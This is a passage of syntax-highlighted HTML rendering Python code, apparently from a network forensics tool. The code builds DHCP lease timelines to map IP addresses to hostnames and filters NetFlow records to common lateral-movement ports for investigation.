keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Assign'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> ip </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> active</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    old </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> active</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">old</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> old</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> old</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                active</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> ev</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">elif</span><span class=\"token plain\"> ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Release'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Lease_Expired'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"> ip </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> active</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                old </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> active</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">pop</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">old</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> old</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> old</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ev </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> active</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">items</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ev</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">ip_timeline </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">dict</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[+] DHCP: loaded timeline for </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">self</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token string-interpolation interpolation\">ip_timeline</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> IPs\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">resolve_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> query_time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"Resolve IP address to hostname at a given time using DHCP timeline.\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> start</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> end</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> mac </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> start </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> query_time </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">end </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">is</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">or</span><span class=\"token plain\"> query_time </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> end</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> mac</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'unknown'</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Fallback to IP if no DHCP record</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">load_netflow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> csv_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> lateral_ports</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"Load NetFlow records, focusing on lateral movement ports.\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> lateral_ports </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">is</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            lateral_ports </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">445</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">135</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">3389</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5985</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5986</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">22</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">23</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">139</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">open</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">csv_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> row </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> csv</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">DictReader</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">try</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    dst_port </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">int</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_port'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> dst_port </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> lateral_ports</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">netflow_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">fromisoformat</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'src_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'src_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_port'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> dst_port</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'bytes'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">int</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'bytes'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'flags'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'flags'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">''</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">except</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ValueError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> KeyError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" 